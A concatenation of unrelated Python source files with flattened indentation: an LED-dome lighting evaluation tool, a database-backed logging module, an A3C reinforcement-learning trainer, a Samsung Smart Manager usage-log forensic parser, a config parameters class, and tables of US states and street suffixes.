CAMERA_SHORT_DESCRIPTION = camera_layout.getShortDescription()
LED_SCORE_LOG_FILE = PARSE_OPTIONS.LED_SCORE_LOG_FILE if PARSE_OPTIONS.LED_SCORE_LOG_FILE != None and os.path.exists(PARSE_OPTIONS.LED_SCORE_LOG_FILE) else ""
logged_score_to_file = False
BEST_LEDS = None
TARGET_TRIANGLES = None
TARGET_SHAPE_NAME = ''
BEST_LED_DATA_HEADER = None
BEST_LED_DATA = None
#BEST_LED_DATA_HEADER = file_io.read_in_csv_file_header_to_list(LED_SCORE_LOG_FILE) if SELECT_BEST_LEDS else None
#BEST_LED_DATA = file_io.read_in_csv_file_to_list_of_lists(LED_SCORE_LOG_FILE, skip_header=True) if SELECT_BEST_LEDS else None
HELP = {}
# ======================================================================
# --- Live config update
# ======================================================================
def define_help():
global HELP
HELP['r'] = "Toggle scoring (maximised intensity / maximised target coverage)."
HELP['c'] = "Toggle camera positioning."
HELP['t'] = "Toggle test evaluation mode to verify angles and scoring.\n\t- Use Left-Arrow and Right-Arrow to change LED.\n\t- Use y/h/u/j/i/k to update incident ray X,Y,Z coordinate."
#HELP['n'] = "Toggle target normals"
HELP['l'] = "Load new score file."
HELP['+'] = "Increase LEDs selected. (Shading Score only. Unchecked bounds.)"
HELP['-'] = "Decrease LEDsdata_3d selected. (Shading Score only. Unchecked bounds.)"
HELP['ws,ad,qe'] = "Manipulate the viewport XYZ positions (ws, ad, qe), or click-drag with mouse."
HELP['Up'] = "Zoom in / Wheel-up"
HELP['Down'] = "Zoom out / Wheel-down"
HELP['F1'] = "Display help."
HELP['Space'] = "Toggle scene rotation."
HELP['Esc'] = "Exit."
print("\nPress F1 to display help.\n")
def update_configs_via_keypress(key_events):
k = key_events.get_key()
if k == '':
return
if k == 'r':
toggle_reflection_score()
elif k == 'c':
toggle_camera_setup()
elif k == 't':
toggle_test_evaluation_mode()
elif k == 'l':
load_new_score_file()
elif k == GLUT_KEY_F1:
toggle_help()
elif k == '+':
increment_LED_quantity()
elif k == '-':
decrement_LED_quantity()
def toggle_help():
global HELP
print("---Help:---")
for k in HELP:
print(" "+str(k) +"\t"+ str(HELP[k]))
print("-----------")
def toggle_reflection_score():
global USE_SHADING_SCORE, USE_COVERAGE_SCORE, SCORE_DESCRIPTION, CSV_METRIC_COLUMN_INDEX, BEST_LEDS, QTY_OF_BEST_LEDS_REQUIRED
USE_SHADING_SCORE = not USE_SHADING_SCORE # T -> F
USE_COVERAGE_SCORE = not USE_SHADING_SCORE # F -> not F -> T
SCORE_DESCRIPTION = "Shading Score" if USE_SHADING_SCORE else "Coverage Error"
CSV_METRIC_COLUMN_INDEX = 1 if USE_SHADING_SCORE else 3
BEST_LEDS = None
if USE_COVERAGE_SCORE:
QTY_OF_BEST_LEDS_REQUIRED = default_QTY_OF_BEST_LEDS_REQUIRED()
msg = "Toggled scoring to Shading Score" if USE_SHADING_SCORE else "Toggled scoring to Coverage Score"
print(msg)
def toggle_camera_setup():
global scale, camera_layout
camera_layout = CameraLayout_EvenBias( scale ) if type(camera_layout) == CameraLayout_RealisticBias else CameraLayout_RealisticBias( scale )
msg = "Toggled camera to "+camera_layout.getShortDescription()
print(msg)
def toggle_test_evaluation_mode():
global SELECT_BEST_LEDS, DO_EVALUATIONS
SELECT_BEST_LEDS = not SELECT_BEST_LEDS
DO_EVALUATIONS = False if not SELECT_BEST_LEDS else True
msg = "Toggled test evaluation mode off" if SELECT_BEST_LEDS else "Toggled test evaluation mode on."
print(msg)
def load_new_score_file():
global LED_SCORE_LOG_FILE, BEST_LED_DATA, BEST_LED_DATA_HEADER, BEST_LEDS
print(" === LOAD NEW SCORE FILE ===")
print("Enter new input score filename and press enter:")
print(" --- Current filename: "+LED_SCORE_LOG_FILE)
new_filename = raw_input()
if os.path.exists(new_filename):
LED_SCORE_LOG_FILE = new_filename
BEST_LEDS = None
load_score_file()
print("Loaded new file: "+str(new_filename))
else:
print("File does not exist - no changes applied.")
def increment_LED_quantity():
global QTY_OF_BEST_LEDS_REQUIRED, BEST_LEDS
if not USE_COVERAGE_SCORE:
QTY_OF_BEST_LEDS_REQUIRED += 1
BEST_LEDS = None
print("Increased QTY_OF_BEST_LEDS "+str(QTY_OF_BEST_LEDS_REQUIRED)+". Unchecked bounds.")
elif USE_COVERAGE_SCORE:
QTY_OF_BEST_LEDS_REQUIRED = default_QTY_OF_BEST_LEDS_REQUIRED()
def decrement_LED_quantity():
global QTY_OF_BEST_LEDS_REQUIRED, BEST_LEDS
if not USE_COVERAGE_SCORE:
QTY_OF_BEST_LEDS_REQUIRED -= 1
BEST_LEDS = None
print("Decreased QTY_OF_BEST_LEDS "+str(QTY_OF_BEST_LEDS_REQUIRED)+". Unchecked bounds.")
elif USE_COVERAGE_SCORE:
QTY_OF_BEST_LEDS_REQUIRED = default_QTY_OF_BEST_LEDS_REQUIRED()
# ======================================================================
# --- Draw simulation objects
# ======================================================================
class Tool:
def __init__(self):
global scale
self.scale = scale
self.cameras_vertices = camera_layout.getCameraPositions()
self.tool = ToolSelector(self.scale)
self.OLD_TOOLS_HERE = OldToolSelector_Untested(self.scale)
def run( self ):
# TODO: This is a hack to make running evaluations faster. An ideal implementation will refactor run.py module to separate GL from numerical evaluations.
if glutGet(GLUT_INIT_STATE) == 1:
draw_axes(self.scale, 2)
draw_cameras(self.cameras_vertices)
tool_selected = self.tool.selector()
if not tool_selected:
self.OLD_TOOLS_HERE.selector(self.scale, self.cameras_vertices)
class ToolSelector(object):
"""
The fundamental conduit and selection mechanic to choose application behaviour; e.g. evaluations vs display vs tuning. and which behaviour strategy.
"""
warned = False
def __init__(self, scale):
self.cached_tool = None
# self.triangles, self.shape_name = get_target_shape_triangles()
self.triangles, self.shape_name = WaveFront.get_target_shape(
PARSE_OPTIONS.TARGET_SHAPE,
PARSE_OPTIONS.TARGET_SCALE,
eval(PARSE_OPTIONS.TARGET_TRANSLATION)
)
self.scale = scale
def selector(self):
result = True
triangles = self.triangles[:]
shape_name = self.shape_name
kwords = {
'all_leds': WaveFront.get_hardcoded_frame(self.scale)
# draw_dome(self.scale,
# show_points=False,
# show_led_spheres=False,
# show_tris=False,
# show_lines=False,
# get_not_show_tris=False,
# show_selected_leds=None)
}
# (1) Select Class Reference to Execute: ( See modes/illuminance/illuminance.py classes. )
if self.cached_tool is None:
switcher = {
3: VertexIndexPositionEvaluator,
4: EdgeXIndexPositionEvaluator,
7: RawPositionEvaluator,
8: VertexMappedPositionEvaluator,
9: EdgeXMappedPositionEvaluator,
}
tool_class = switcher.get(PARSE_OPTIONS.EVALUATION_METRIC_MODE, None)
# Instantiate Selected (1) Class
self.cached_tool = tool_class(kwords) if tool_class is not None else None
if self.cached_tool is None:
result = False
if ToolSelector.warned is False:
logging.warning("New Tool strategy failed to be selected and/or initialized.")
ToolSelector.warned = True
# (3) Select Function Reference to Execute:
if result:
switcher = {
1: self.cached_tool.display,
2: self.cached_tool.evaluate,
3: self.cached_tool.tune,
4: self.cached_tool.sequence_runner,
}
func = switcher.get(PARSE_OPTIONS.EVALUATION, lambda x: None)
#Execute (2) function on that (1) class:
func(triangles)
return result
class OldToolSelector_Untested(ToolSelector):
"""
Evaluation (-m2) disabled in favour of cleaner code, more modern opengl code and illuminance evaluation methods.
Viewing (-m1) positions from file, etc. remains operable.
Also see /modes/luminance/luminance.py
"""
warned = False
def selector(self, scale, camerasVertices):
global camera_layout
if not OldToolSelector_Untested.warned:
print("Warning pre:v0.1.3 mode selected: Check runtime argument -e (--evaluation-metric-mode): " +str(PARSE_OPTIONS.EVALUATION_METRIC_MODE))
print("--Untested features ahead--")
OldToolSelector_Untested.warned = True
triangles = self.triangles[:]
shape_name = self.shape_name
do_demo = PARSE_OPTIONS.EVALUATION == 1
do_evaluation = PARSE_OPTIONS.EVALUATION == 2
do_tune = PARSE_OPTIONS.EVALUATION == 3
# todo: This is a hack. Replace with polymorphic calls. Separate off the pre-V0.1.3 code that depend on options and globals instead of depend on properties file. Move luminance.py module code and unused reflectance modes - METRIC_MODE:0,1,4,5,6 out.
if PARSE_OPTIONS.EVALUATION_METRIC_MODE == 0:
if do_demo:
draw_selected_leds( camerasVertices, triangles, shape_name)
elif do_evaluation:
print("No evaluation mode. Try demo mode (i.e. -m1)")
pass
elif do_tune:
print("No tune mode. Try demo mode (i.e. -m1)")
pass
elif PARSE_OPTIONS.EVALUATION_METRIC_MODE == 1: #EVALUATION_MODE_REFLECTANCE:
self.cached_tool = self.cached_tool if self.cached_tool is not None else MeasureReflectanceIntoCameras()
if do_demo:
all_leds = draw_dome(scale, True)
kwords = {
'LED_SCORE_LOG_FILE': LED_SCORE_LOG_FILE,
'CSV_METRIC_COLUMN_INDEX': 3,
'QTY_OF_BEST_LEDS_REQUIRED': QTY_OF_BEST_LEDS_REQUIRED,
'all_leds': all_leds,
'DO_EVALUATIONS': DO_EVALUATIONS,
'TARGET_ROTATIONS': TARGET_ROTATIONS,
'TARGET_TRIANGLES': TARGET_TRIANGLES,
'TARGET_ROTATION_DEGREES': TARGET_ROTATION_DEGREES,
'TARGET_ROTATION_AXIS': TARGET_ROTATION_AXIS,
'TARGET_SCALE': TARGET_SCALE,
'TARGET_TRANSLATION': TARGET_TRANSLATION,
'logged_score_to_file': logged_score_to_file,
'SELECT_BEST_LEDS': SELECT_BEST_LEDS,
'PARSE_OPTIONS': PARSE_OPTIONS,
}
self.cached_tool.display(triangles, shape_name, kwords)
elif do_evaluation:
#all_leds = draw_dome(scale, True)
all_leds = draw_dome(scale,
show_points=False,
show_led_spheres=False,
show_tris=False,
show_lines=False,
get_not_show_tris=False,
show_selected_leds=None)
kwords = {
'LED_SCORE_LOG_FILE': LED_SCORE_LOG_FILE,
'CSV_METRIC_COLUMN_INDEX': 3,
'QTY_OF_BEST_LEDS_REQUIRED': QTY_OF_BEST_LEDS_REQUIRED,
'all_leds': all_leds,
'DO_EVALUATIONS': DO_EVALUATIONS,
'TARGET_ROTATIONS': TARGET_ROTATIONS,
'TARGET_TRIANGLES': TARGET_TRIANGLES,
'TARGET_ROTATION_DEGREES': TARGET_ROTATION_DEGREES,
'TARGET_ROTATION_AXIS': TARGET_ROTATION_AXIS,
'TARGET_SCALE': TARGET_SCALE,
'TARGET_TRANSLATION': TARGET_TRANSLATION,
'logged_score_to_file': logged_score_to_file,
'SELECT_BEST_LEDS': SELECT_BEST_LEDS,
'PARSE_OPTIONS': PARSE_OPTIONS,
}
self.cached_tool.evaluate( camerasVertices, triangles, shape_name, camera_layout, kwords)
elif do_tune:
print("No tune mode. Try demo mode (i.e. -m1)")
pass
elif PARSE_OPTIONS.EVALUATION_METRIC_MODE == 2: #EVALUATION_MODE_ILLUMINATION:
#evaluate_illuminance_score( camerasVertices, triangles, shape_name )
if do_demo:
#draw_selected_leds( camerasVertices, triangles, shape_name)
#evaluate_illuminance_score( camerasVertices, triangles, shape_name)
print("This evaluation metric mode has been disabled and is marked for refactoring.")
elif do_evaluation:
print("This evaluation metric mode has been disabled and is marked for refactoring.")
elif do_tune:
print("No tune mode. Try demo mode (i.e. -m1)")
pass
GracefulShutdown.do_shutdown()
# elif PARSE_OPTIONS.EVALUATION_METRIC_MODE == 4: #EVALUATION_MODE_ILLUMINATION_MULTI:
# raise("This evaluation metric needs refactoring. To be refactored and tested. Now exiting.")
# sys.exit()
# all_leds = draw_dome( scale , True )
# kwords = {
# 'LED_SCORE_LOG_FILE':LED_SCORE_LOG_FILE,
# 'CSV_METRIC_COLUMN_INDEX':3,
# 'QTY_OF_BEST_LEDS_REQUIRED':QTY_OF_BEST_LEDS_REQUIRED,
# 'all_leds':all_leds
# }
# evaluate_illuminance_score_multiple_result_file_set( updateable_line, camerasVertices, triangles, shape_name, 100000, kwords )
#
# elif PARSE_OPTIONS.EVALUATION_METRIC_MODE == 5: #EVALUATION_MODE_ILLUMINATION_WEIGHT:
# ## --- evaluate_illuminance_score_result_file_set_tune_weights( updateable_line, camerasVertices, triangles, shape_name )
# #x = MeasureIlluminanceTuneWeights_AOS()
# #x.evaluate(updateable_line, camerasVertices, triangles, shape_name)
# raise("This evaluation metric needs refactoring. To be refactored and tested. Now exiting.")
# sys.exit()
#
# elif PARSE_OPTIONS.EVALUATION_METRIC_MODE == 6: #EVALUATION_MODE_ILLUMINATION_WEIGHT:
# raise("This evaluation metric needs refactoring. To be refactored and tested. Now exiting.")
# sys.exit()
#
# kwords = {}
# evaluate_minimised_distance_to_neighbours( camerasVertices, triangles, kwords )
def draw_selected_leds( camerasVertices, triangles, shape_name ):
best_LEDs = get_best_leds_from_file()
score = get_best_score(best_LEDs)
# leds = draw_dome( scale , show_selected_leds=best_LEDs )
leds = []
qty_leds = len(best_LEDs) if type(best_LEDs) is list else -1
filename = LED_SCORE_LOG_FILE if os.path.exists(LED_SCORE_LOG_FILE) else "(Press L to load file)"
for tri in triangles:
make_triangle_face( tri )
string = []
string.append("Data file "+str(SCORE_DESCRIPTION)+": "+str(round(score,2)))
string.append("Data file: "+str(filename))
string.append("")
string.append("LED Qty: "+str(qty_leds))
string.append("Camera Qty: "+str(len(camerasVertices))+" "+str(CAMERA_SHORT_DESCRIPTION))
#string.append("Camera Layout: "+str(CAMERA_SHORT_DESCRIPTION)+" (as shown not collected)")
string.append("Target Model: "+str(shape_name))
string.append("Target Scaling Factor: "+str(TARGET_SCALE))
string.append("Target Translation: "+str(TARGET_TRANSLATION))
string.append("Target Tri Qty: "+str(len(triangles)))
string.reverse()
for i in range(len(string)):
draw_text(string[i],20,20+(i*15))
def get_target_shape_triangles():
global TARGET_TRIANGLES, TARGET_SHAPE, TARGET_SHAPE_NAME, TARGET_TRANSLATION
# Here be dragons..
filename = "../models/dome/dome_c.obj"
shape_name = "Dome"
dome_scale = 1
if TARGET_TRIANGLES == None:
# At time of writing (05/2017), the hardcoded dome model's face mappings are not correct;
# that model is incomplete. Therefore, we __must__ use the loaded dome from file, in order to evaluate.
filename = TARGET_SHAPE if TARGET_SHAPE is not None else filename
scale = TARGET_SCALE if TARGET_SCALE is not None else dome_scale
TARGET_SHAPE_NAME = os.path.basename(TARGET_SHAPE) if TARGET_SHAPE is not None else shape_name
# triangles = obj_model_reader.get_all_object_triangles(filename=filename, scale=scale, translation=TARGET_TRANSLATION)
triangles = obj_model_reader.get_all_object_polyfaces( filename, scale, translation=TARGET_TRANSLATION )
checkShapeValidity( triangles )
TARGET_TRIANGLES = triangles
return TARGET_TRIANGLES, TARGET_SHAPE_NAME
def load_score_file():
global BEST_LED_DATA, BEST_LED_DATA_HEADER
BEST_LED_DATA_HEADER = file_io.read_in_csv_file_header_to_list(LED_SCORE_LOG_FILE) if SELECT_BEST_LEDS else None
BEST_LED_DATA = file_io.read_in_csv_file_to_list_of_lists(LED_SCORE_LOG_FILE, skip_header=True) if SELECT_BEST_LEDS else None
def get_best_leds_from_file():
global BEST_LEDS, BEST_LED_DATA
if BEST_LEDS == None and BEST_LED_DATA == None: #1) BEST not loaded, and not loaded into DATA
if os.path.exists(LED_SCORE_LOG_FILE): #if: data file exists, then: load it into DATA
load_score_file()
else: #else: if file doesn't exist, continue with no data.
pass
if BEST_LEDS == None and BEST_LED_DATA != None:
if USE_SHADING_SCORE or USE_COVERAGE_SCORE:
BEST_LEDS = get_sorted_column_from_result_file( BEST_LED_DATA, CSV_METRIC_COLUMN_INDEX, QTY_OF_BEST_LEDS_REQUIRED )
# try_to_verify_symmetry( BEST_LED_DATA, column_index=3 )
return BEST_LEDS
def get_best_score(best_LEDs):
v = -1
if best_LEDs != None: # Not loaded from file, then skip
if USE_SHADING_SCORE:
v = 0
for i in best_LEDs:
v += float(BEST_LED_DATA[i][ CSV_METRIC_COLUMN_INDEX ]) # Accumulate the reflection score per LED entry.
elif USE_COVERAGE_SCORE:
try:
v = int(BEST_LED_DATA_HEADER[3].replace('coverage_error=',''))
except ValueError:
pass
else:
raise ValueError("Invalid scoring metric selected..")
return v
|
1690316
|
import os
import logging
import sys
from logging.handlers import RotatingFileHandler
from mlcomp import LOG_FOLDER, LOG_NAME, FILE_LOG_LEVEL, DB_LOG_LEVEL, \
CONSOLE_LOG_LEVEL
from mlcomp.db.core import Session
from mlcomp.db.providers import LogProvider
from mlcomp.db.models import Log
from mlcomp.utils.misc import now
ROOT = os.path.abspath(os.path.join(os.path.dirname(__file__), '../'))
class Formatter(logging.Formatter):
def format(self, record):
if not record.pathname.startswith(ROOT):
try:
return super().format(record)
except Exception:
return record.msg
msg = str(record.msg)
if record.args:
try:
msg = msg % record.args
except Exception:
pass
record.message = msg
if self.usesTime():
record.asctime = self.formatTime(record, self.datefmt)
s = self.formatMessage(record)
if record.exc_info:
# Cache the traceback text to avoid converting it multiple times
# (it's constant anyway)
if not record.exc_text:
record.exc_text = self.formatException(record.exc_info)
if record.exc_text:
if s[-1:] != '\n':
s = s + '\n'
s = s + record.exc_text
if record.stack_info:
if s[-1:] != '\n':
s = s + '\n'
s = s + self.formatStack(record.stack_info)
return s
class DbHandler(logging.Handler):
"""
A handler class which writes logging records, appropriately formatted,
to the database.
"""
def __init__(self, session: Session):
"""
Initialize the handler.
"""
logging.Handler.__init__(self)
self.provider = LogProvider(session)
def emit(self, record):
"""
Emit a record.
"""
try:
if not record.pathname.startswith(ROOT):
return
assert 1 <= len(record.args), \
'Args weer not been provided for logging'
assert len(record.args) <= 4, 'Too many args for logging'
step = None
task = None
computer = None
if len(record.args) == 1:
component = record.args[0]
elif len(record.args) == 2:
component, computer = record.args
elif len(record.args) == 3:
component, computer, task = record.args
else:
component, computer, task, step = record.args
if not isinstance(component, int):
component = component.value
module = os.path.relpath(record.pathname, ROOT). \
replace(os.sep, '.').replace('.py', '')
if record.funcName and record.funcName != '<module>':
module = f'{module}:{record.funcName}'
log = Log(
message=record.msg[-16000:],
time=now(),
level=record.levelno,
step=step,
component=component,
line=record.lineno,
module=module,
task=task,
computer=computer
)
self.provider.add(log)
except Exception:
self.handleError(record)
def create_logger(session: Session, name: str, db=True, file=True,
console=True):
logger = logging.Logger(name)
logger.handlers = []
if console:
console_handler = logging.StreamHandler()
console_handler.setLevel(CONSOLE_LOG_LEVEL)
console_handler.stream = sys.stdout
logger.handlers.append(console_handler)
if file:
file_path = os.path.join(LOG_FOLDER, f'{LOG_NAME}.txt')
file_handler = RotatingFileHandler(file_path)
file_handler.setLevel(FILE_LOG_LEVEL)
file_handler.maxBytes = 10485760
file_handler.backupCount = 1
logger.handlers.append(file_handler)
if db:
handler = DbHandler(session)
handler.setLevel(DB_LOG_LEVEL)
logger.handlers.append(handler)
for h in logger.handlers:
fmt = '%(asctime)s.%(msecs)03d %(levelname)s' \
' %(module)s - %(funcName)s: %(message)s'
datefmt = '%Y-%m-%d %H:%M:%S'
if isinstance(h, DbHandler):
fmt, datefmt = None, None
h.formatter = Formatter(fmt=fmt, datefmt=datefmt)
# ignore messages from some libraries
class NoRunningFilter(logging.Filter):
def filter(self, record):
return 'ran tasks' not in str(record.msg)
for k in logging.root.manager.loggerDict:
if 'apscheduler' in k:
logging.getLogger(k).setLevel(logging.ERROR)
if 'mlcomp' in k:
logging.getLogger(k).addFilter(NoRunningFilter())
if 'serializer' in k:
logging.getLogger(k).setLevel(logging.ERROR)
return logger
__all__ = ['create_logger']
|
1690329
|
import multiprocessing
import os
import time
import gym
import numpy as np
import tensorflow as tf
import tensorlayer as tl
from RLToolbox.toolbox.common.utils import *
from RLToolbox.agent.A3C_agent import A3CAgent
from RLToolbox.storage.storage_continous_parallel import ParallelStorage
from RLToolbox.toolbox.baseline.baseline_zeros import Baseline
from RLToolbox.toolbox.distribution.diagonal_gaussian import DiagonalGaussian
from RLToolbox.environment.gym_environment import Environment
from parameters import PMS_base
class NetworkTLAction(object):
def __init__(self, scope):
with tf.variable_scope("%s_shared" % scope):
self.states = tf.placeholder(
tf.float32 , shape=[None] + pms.obs_shape , name="%s_obs" % scope)
self.action_n = tf.placeholder(tf.float32 , shape=[None , pms.action_shape] , name="%s_action" % scope)
self.advant = tf.placeholder(tf.float32 , shape=[None] , name="%s_advant" % scope)
network = tl.layers.InputLayer(self.states , name='%s_input_layer'%scope)
network = tl.layers.DenseLayer(network , n_units=64 ,
act=tf.nn.relu , name="%s_fc1"%scope)
network = tl.layers.DenseLayer(network , n_units=64 ,
act=tf.nn.relu , name="%s_fc2"%scope)
network = tl.layers.DenseLayer(network , n_units=pms.action_shape,
name="%s_fc3"%scope)
self.action_dist_means_n = network.outputs
self.action_dist_logstd_param = tf.Variable(
(.01 * np.random.randn(1 , pms.action_shape)).astype(np.float32) , name="%spolicy_logstd" % scope)
# self.action_dist_logstd_param = tf.maximum(self.action_dist_logstd_param, np.log(pms.min_std))
self.action_dist_logstds_n = tf.tile(self.action_dist_logstd_param ,
tf.pack((tf.shape(self.action_dist_means_n)[0] , 1)))
self.var_list = [v for v in tf.trainable_variables() if v.name.startswith(scope)]
class NetworkTLValue(object):
def __init__(self, scope):
with tf.variable_scope("%s_shared" % scope):
self.states = tf.placeholder(
tf.float32 , shape=[None] + pms.obs_shape , name="%s_obs" % scope)
self.R = tf.placeholder(tf.float32 , shape=[None] , name="%s_R" % scope)
network = tl.layers.InputLayer(self.states , name='%s_input_layer'%scope)
network = tl.layers.DenseLayer(network , n_units=64,
act=tf.nn.relu , name="%s_fc1"%scope)
# network = tl.layers.DenseLayer(network , n_units=64 ,
# act=tf.nn.relu , name="%s_fc2"%scope)
network = tl.layers.DenseLayer(network , n_units=1,name="%s_fc3"%scope)
self.value = network.outputs
self.var_list = [v for v in tf.trainable_variables() if v.name.startswith(scope)]
if __name__ == "__main__":
pms = PMS_base()
pms.train_flag = True
pms.load_model_before_train = False
pms.render = False
args = pms
if not os.path.isdir(pms.checkpoint_dir):
os.makedirs(pms.checkpoint_dir)
if not os.path.isdir("./log"):
os.makedirs("./log")
params = {"environment":Environment,
"baseline":Baseline,
"distribution":DiagonalGaussian,
"storage":ParallelStorage,
"agent":A3CAgent}
args.max_pathlength = gym.spec(args.environment_name).timestep_limit
learner_tasks = multiprocessing.JoinableQueue()
learner_results = multiprocessing.Queue()
learner_env = params["environment"]
net = dict(action_net=NetworkTLAction("action"), value_net=NetworkTLValue("value"))
baseline = params["baseline"]()
distribution = params["distribution"](pms.action_shape)
learners = []
for i in xrange(4):
learner = params["agent"](learner_env, session=None, baseline=baseline, storage=None, distribution=distribution, net=net, pms=pms, task_q=learner_tasks, result_q=learner_results, process_id=i)
learners.append(learner)
for learner in learners:
learner.start()
if pms.load_model_before_train:
data = np.load(os.path.join(pms.checkpoint_dir, "model.npz"))
theta = data["theta"]
theta_v = data["theta_v"]
else:
learner_tasks.put(dict(type="GET_PARAM"))
learner_tasks.join()
theta, theta_v = learner_results.get()
if pms.train_flag:
for i in xrange(pms.max_iter_number):
print "#############%d###########" % i
if i % pms.save_model_times == 0 and i != 0:
## save model
print "save_checkpoint"
# learner_tasks.put(dict(type="GET_PARAM"))
# learner_tasks.join()
# theta, theta_v = learner_results.get()
np.savez(os.path.join(pms.checkpoint_dir, "model.npz"), theta=theta, theta_v=theta_v)
for k in xrange(pms.jobs):
command = dict(type="TRAIN", action_param=theta, value_param=theta_v)
learner_tasks.put(command)
learner_tasks.join()
thetas = []
theta_vs = []
for k in xrange(pms.jobs):
delta_theta, delta_theta_v = learner_results.get()
thetas.append(delta_theta)
theta_vs.append(delta_theta_v)
# update net
theta += np.array(thetas).sum(axis=0)
theta_v += np.array(theta_vs).sum(axis=0)
# print "theta:" + str(theta)
# print "theta_v" + str(theta_v)
print
else:
for k in xrange(20):
command = dict(type="TEST", action_param=theta, value_param=theta_v)
learner_tasks.put(command)
learner_tasks.join()
for k in xrange(pms.jobs):
command = dict(type="STOP", action_param=theta, value_param=theta_v)
learner_tasks.put(command)
learner_tasks.join()
exit()
|
1690337
|
import sqlite3
import textwrap
from scripts.artifact_report import ArtifactHtmlReport
from scripts.ilapfuncs import logfunc, tsv, timeline, is_platform_windows, open_sqlite_db_readonly
def get_smanagerLow(files_found, report_folder, seeker, wrap_text):
file_found = str(files_found[0])
db = open_sqlite_db_readonly(file_found)
cursor = db.cursor()
cursor.execute('''
SELECT
datetime(start_time /1000, "unixepoch"),
datetime(end_time /1000, "unixepoch"),
id,
package_name,
uploaded,
datetime(created_at /1000, "unixepoch"),
datetime(modified_at /1000, "unixepoch")
from usage_log
''')
all_rows = cursor.fetchall()
usageentries = len(all_rows)
if usageentries > 0:
report = ArtifactHtmlReport('Samsung Smart Manager - Usage')
report.start_artifact_report(report_folder, 'Samsung Smart Manager - Usage')
report.add_script()
data_headers = ('Start Time','End Time','ID','Package Name', 'Uploaded?', 'Created', 'Modified' )
data_list = []
for row in all_rows:
data_list.append((row[0],row[1],row[2],row[3],row[4],row[5],row[6]))
report.write_artifact_data_table(data_headers, data_list, file_found)
report.end_artifact_report()
tsvname = f'samsung smart manager - usage'
tsv(report_folder, data_headers, data_list, tsvname)
tlactivity = f'Samsung Smart Manager - Usage'
timeline(report_folder, tlactivity, data_list, data_headers)
else:
logfunc('No Samsung Smart Manager - Usage data available')
db.close()
return
|
1690344
|
import json
import argparse
import yaml
import copy
from flair.utils import logging
from flair.algorithms import dict_merge
logger = logging.init_logger()
class Params(object):
"""
Parameters
"""
def __init__(self, params):
self.params = params
def __eq__(self, other):
if not isinstance(other, Params):
logger.info('The params you compare is not an instance of Params. ({} != {})'.format(
type(self), type(other)
))
return False
this_flat_params = self.as_flat_dict()
other_flat_params = other.as_flat_dict()
if len(this_flat_params) != len(other_flat_params):
logger.info('The numbers of parameters are different: {} != {}'.format(
len(this_flat_params),
len(other_flat_params)
))
return False
same = True
for k, v in this_flat_params.items():
if k == 'environment.recover':
continue
if k not in other_flat_params:
logger.info('The parameter "{}" is not specified.'.format(k))
same = False
elif other_flat_params[k] != v:
logger.info('The values of "{}" not not the same: {} != {}'.format(
k, v, other_flat_params[k]
))
same = False
return same
def __getitem__(self, item):
if item in self.params:
return self.params[item]
else:
raise KeyError
def __setitem__(self, key, value):
self.params[key] = value
def __delitem__(self, key):
del self.params[key]
def __iter__(self):
return iter(self.params)
def __len__(self):
return len(self.params)
def items(self):
return self.params.items()
def get(self, key, default=None):
return self.params.get(key, default)
def as_flat_dict(self):
"""
Returns the parameters of a flat dictionary from keys to values.
Nested structure is collapsed with periods.
"""
flat_params = {}
def recurse(parameters, path):
for key, value in parameters.items():
newpath = path + [key]
if isinstance(value, dict):
recurse(value, newpath)
else:
flat_params['.'.join(newpath)] = value
recurse(self.params, [])
return flat_params
def to_file(self, output_json_file):
with open(output_json_file, 'w', encoding='utf-8') as f:
json.dump(self.params, f, indent='\t')
@classmethod
def from_file(cls, params_file_list):
params_file_list = params_file_list.split(",")
params_dict = {}
for params_file in params_file_list:
with open(params_file, encoding='utf-8') as f:
if params_file.endswith('.yaml'):
dict_merge.dict_merge(params_dict, yaml.load(f))
elif params_file.endswith('.json'):
params_dict = json.load(f)
else:
raise NotImplementedError
return cls(params_dict)
def __repr__(self):
return json.dumps(self.params, indent=2)
def duplicate(self) -> 'Params':
"""
Uses ``copy.deepcopy()`` to create a duplicate (but fully distinct)
copy of these Params.
"""
return Params(copy.deepcopy(self.params))
def remove_pretrained_embedding_params(params):
def recurse(parameters, key):
for k, v in parameters.items():
if key == k:
parameters[key] = None
elif isinstance(v, dict):
recurse(v, key)
recurse(params, 'pretrained_file')
|
1690359
|
STATES = (
('AK', 'Alaska'),
('AL', 'Alabama'),
('AR', 'Arkansas'),
('AZ', 'Arizona'),
('CA', 'California'),
('CO', 'Colorado'),
('CT', 'Connecticut'),
('DC', 'District of Columbia'),
('DE', 'Delaware'),
('FL', 'Florida'),
('GA', 'Georgia'),
('HI', 'Hawaii'),
('IA', 'Iowa'),
('ID', 'Idaho'),
('IL', 'Illinois'),
('IN', 'Indiana'),
('KS', 'Kansas'),
('KY', 'Kentucky'),
('LA', 'Louisiana'),
('MA', 'Massachusetts'),
('MD', 'Maryland'),
('ME', 'Maine'),
('MI', 'Michigan'),
('MN', 'Minnesota'),
('MO', 'Missouri'),
('MS', 'Mississippi'),
('MT', 'Montana'),
('NC', 'North Carolina'),
('ND', 'North Dakota'),
('NE', 'Nebraska'),
('NH', 'New Hampshire'),
('NJ', 'New Jersey'),
('NM', 'New Mexico'),
('NV', 'Nevada'),
('NY', 'New York'),
('OH', 'Ohio'),
('OK', 'Oklahoma'),
('OR', 'Oregon'),
('PA', 'Pennsylvania'),
('RI', 'Rhode Island'),
('SC', 'South Carolina'),
('SD', 'South Dakota'),
('TN', 'Tennessee'),
('TX', 'Texas'),
('UT', 'Utah'),
('VA', 'Virginia'),
('VI', 'Virgin Islands'),
('VT', 'Vermont'),
('WA', 'Washington'),
('WI', 'Wisconsin'),
('WV', 'West Virginia'),
('WY', 'Wyoming'),
)
NUM_STATES = len(STATES)
STREET_SUFFIX = (
'Alley',
'Annex',
'Arcade',
'Avenue',
'Bend',
'Bay',
'Brae',
'Boulevard',
'Bypass',
'Circle',
'Close',
'Concession',
'Court',
'Cove',
'Crescent',
'Drive',
'Drung',
'Esplanade',
'Expressway',
'Extension',
'Ferry',
'Field',
'Freeway',
'Garden',
'Gardens',
'Gate',
'Glen',
'Green',
'Grove',
'Heights',
'High',
'Highway',
'Hill',
'Lane',
'Line',
'Loop',
'Mall',
'Manor',
'Mews',
'Nene',
'Parade',
'Park',
'Parkway',
'Path',
'Pike',
'Place',
'Plantation',
'Plaza',
'Point',
'Private',
'Promenade',
'Road',
'Side',
'Sideline',
'Route',
'Row',
'Run',
'Spur',
'Square',
'Stravenue',
'Street',
'Terrace',
'Thruway',
'Trace',
'Trail',
'Turnpike',
'Townline',
'Viaduct',
'Walk',
'Way',
'Wood',
'Wynd',
)
